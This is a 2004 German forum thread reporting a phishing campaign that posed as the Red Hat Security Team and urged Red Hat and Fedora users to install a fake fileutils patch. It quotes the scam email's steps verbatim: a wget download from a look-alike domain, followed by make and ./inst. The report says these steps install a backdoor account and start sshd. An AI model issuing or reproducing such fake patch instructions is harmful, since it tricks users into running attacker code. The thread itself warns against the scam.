WinFuture-Forum.de: Red-hat- Und Fedora-anwender Im Visier Von Cracker - WinFuture-Forum.de

Zum Inhalt wechseln

Regeln für das News-Forum

Bitte beachte beim Zitieren und Übersetzen von Inhalten folgende Punkte, um das Urheberrecht einzuhalten:

  • Zitate nur in zulässigem Umfang verwenden – Zitate sind nur für Erläuterungen, Kritik oder Berichterstattung erlaubt.
  • Keine Sinnveränderung – Der zitierte Text darf nicht verfälscht werden.
  • Verhältnismäßige Länge – Zitiere nur so viel, wie absolut notwendig ist.
  • Zitate immer klar kennzeichnen – Zitate müssen in den eigenen Beitrag eingebettet sein ("Zitat einfügen").
  • Übersetzungen fremder Werke – Übersetzungen geschützter Texte sind nur erlaubt, wenn die Übersetzung eindeutig als solche gekennzeichnet und die Originalquelle genannt wird.

Die Sprache dieses News-Forums ist deutsch. Wer in einer anderen Sprache eine News posten möchte, sollte sich ein Forum suchen, in dem die gewünschte Sprache gesprochen wird.
Verstöße führen zur Löschung des Beitrags.
Beiträge in diesem Forum erhöhen euren Beitragszähler nicht.
Seite 1 von 1

Red-hat- Und Fedora-anwender Im Visier Von Cracker


#1 Mitglied ist offline   newbasti 

  • Gruppe: aktive Mitglieder
  • Beiträge: 492
  • Beigetreten: 03. Oktober 04
  • Reputation: 0

geschrieben 25. Oktober 2004 - 10:06

Zitat

Jetzt geraten auch Linux-Anwender verstärkt ins Visier von Crackern: Der Linux-Distributor Red Hat warnt vor gefälschten E-Mails, in denen Anwender aufgefordert werden, das Fileutil-Paket zu aktualisieren. Laut der unsignierten Mail seien Fehler in den Befehlen ls und mkdir enthalten, mit denen ein Angreifer über das Netzwerk eigenen Code ausführen könne. Die gut nachgemachte und angeblich vom Red Hat Security Team verfasste Mitteilung enthält eine genaue Anleitung, wie ein Patch zu installieren ist



Zitat

Dear RedHat user,

Redhat found a vulnerability in fileutils (ls and mkdir), that could
allow a remote attacker to execute arbitrary code with root privileges.
Some of the affected linux distributions include RedHat 7.2, RedHat 7.3,
RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is
known that *BSD and Solaris platforms are NOT affected.


The RedHat Security Team strongly advises you to immediately
apply the fileutils-1.0.6 patch.
This is a critical-critical update that you must
make by following these steps:
First download the patch from the Security RedHat mirror:
wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz

Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
cd fileutils-1.0.6.patch
make
./inst




Zitat

Der als Quelle zum Download angebebene Server www.fedora-redhat.com ist allerdings nicht von Red Hat registiert und gehört zu einem Netzblock des Anbieters Yahoo. Der Patch installiert nach ersten Erkenntnissen eine Backdoor auf dem System, in dem er ein Konto ohne Passwort anlegt und den ssh-Daemon startet.

Red Hat weist darauf hin, dass Mails vom Red Hat Security Team immer mit GPG/PGP signiert sind, ebenso wie alle offiziellen Updates für Pakete. Der Schlüssel zum Verifizieren findet sich unter www.redhat.com/security/team/key.html. Anwender sollten immer die Echtheit der zu installierenden Pakete anhand der Signatur überprüfen.


quelle

Anzeige



#2 Mitglied ist offline   hans_maulwurf 

  • Gruppe: aktive Mitglieder
  • Beiträge: 1.354
  • Beigetreten: 23. Februar 04
  • Reputation: 0
  • Wohnort:Oberhausen

geschrieben 25. Oktober 2004 - 10:11

LOL na klar mkdir extrem gefährliches Programm, ich hab auch gehört wenn man mkdir ausführt werden private Daten an Red Hat geschickt.

Thema verteilen:


Seite 1 von 1

1 Besucher lesen dieses Thema
Mitglieder: 0, Gäste: 1, unsichtbare Mitglieder: 0